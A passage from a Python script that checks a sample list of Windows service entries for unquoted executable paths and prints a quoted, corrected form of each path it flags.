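    Service("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    Service("ToolSvc", "Tool", r"C:\Tools\svc.exe --port 9000", "Auto"),
    Service("ManualSvc", "Manual Thing", r"C:\Program Files\Other\svc.exe", "Manual"),
]

if __name__ == "__main__":
    for name in find_unquoted_services(SAMPLE):
        svc = next(s for s in SAMPLE if s.name == name)
        print(f"{name}: {svc.path_name!r} -> {quoted_path_name(svc.path_name)!r}")
```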